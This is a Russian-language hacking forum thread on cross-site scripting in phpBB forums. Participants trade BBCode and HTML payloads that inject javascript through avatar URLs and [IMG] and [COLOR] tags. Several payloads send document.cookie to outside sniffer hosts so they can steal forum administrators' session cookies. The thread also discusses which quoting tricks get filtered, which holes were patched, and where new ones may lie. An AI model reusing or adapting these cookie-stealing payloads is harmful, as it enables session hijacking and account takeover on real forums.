Форумы XSS в phpBB

А так проходит?

Code:

  http://www.smailiki.nm.ru/lam/lam4.gif[color=Red]`[/color] bb=[color=Red]`[/color]http://antichat.ru/cgi-bin/s.jpg?[color=Red]`[/color] style=[color=Red]`[/color]background:url(javascript:document.images[0].src=this.bb+document.cookie)
   

 

такая длинная конструкция - нет
<img src="http://aaa.bb/x.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:documen" alt="" /><br />

Да и админы уже года 2 IE не юзают

 

загнал в аватар тестовую строку
<img src="http://abc.ru/x.gif` style=`background:url(javascript:alert())" alt="" border="0" /><br /><br />

в IE не отработало

 

Он и не сработает ... Я что-то перемудрил по ходу дела....
По идее, сработает он в таком случае:

Code:

 <img src="http://abc.ru/x.gif"style=background-image:url(javascript:alert()) alt="" border="0">
 

Но т.к. кавычки преобразуются, то он тоже не сработает ...)
Сейчас подумаем еще ...

 

вот смотрю на вас и не знаю че сказать...

 

Как бы Егор меня не путал, по идее оба скрипта синтаксически верны:

Code:

     <img src=[color=Red]"[/color]http://abc.ru/x.gif[color=Red]"[/color]style=background-image:url(javascript:alert('1')) alt="" border="0">
     <img src=[color=Red]`[/color]http://abc.ru/x.gif[color=Red]`[/color]style=background-image:url(javascript:alert('2')) alt="" border="0">
     

И вот в чем была моя ошибка и чего я не учел:
Аватара отображается как

Code:

     <img src=[color=Lime]"[/color]http:/site/1.jpg[color=Lime]"[/color] alt="" border="0" />
     

И само собой разумеется, что я предложил синтаксически неверно (в нашем случае):

Code:

      http://www.smailiki.nm.ru/lam/lam4.gif[color=Lime]`[/color] bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)
     

Все это преобразуется в <img src=" http://www.smailiki.nm.ru/lam/lam4.gif` .... ... что является галиматьей полной и естесственно не сработает ...
Получается - раз кавычки преобразуются в &quot; , то за пределы <img src="... никуда не выйти ...

Извиняюсь за свою ошибку - просто я не вчитался в тему ...

 

Ничего, со всякими случается.

 

Не работает...
пишет:
Файл по указанному вами Url не содержит данных
чё не так?...

 

да, попадается...
может на новых версиях не рубит фишка?

 

Дак а какой вариант верный???

 

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[0].src="http://www.sniffsite.ru/sniff.php?"+document.cookie) [/COLOR]

 

вставить можно на некоторых форумах, названия не скажу, эта информация недоступна для таких бухал как ты...

 

Нда ... круто!!!

 

скоро бои устраивать будем =))
да не, чел нормльный вроде, вот как закончит прикалываться, можно даже общаться с ним....

 

Речь шла о пхпбб, а не о Инвизион.

 

wj, прикрыли твои уязвимости в пхпбб. пора новые делать, пусть 20 ю выпускают. )) когда первые заплатки написали, все проходило в другом регистре (URL). а теперь не прокатывает. хотя не знаю как в других форумах, а в пхпбб все хсс можно через админку прикрыть, не меняя кода. но этого никто не делал.

 

Знаю что прикрыли, по этому Я уже прибежал на помощь. Замените мой второй тег урл, на тег мыла.

Так же есть уязвимость в теге картинки.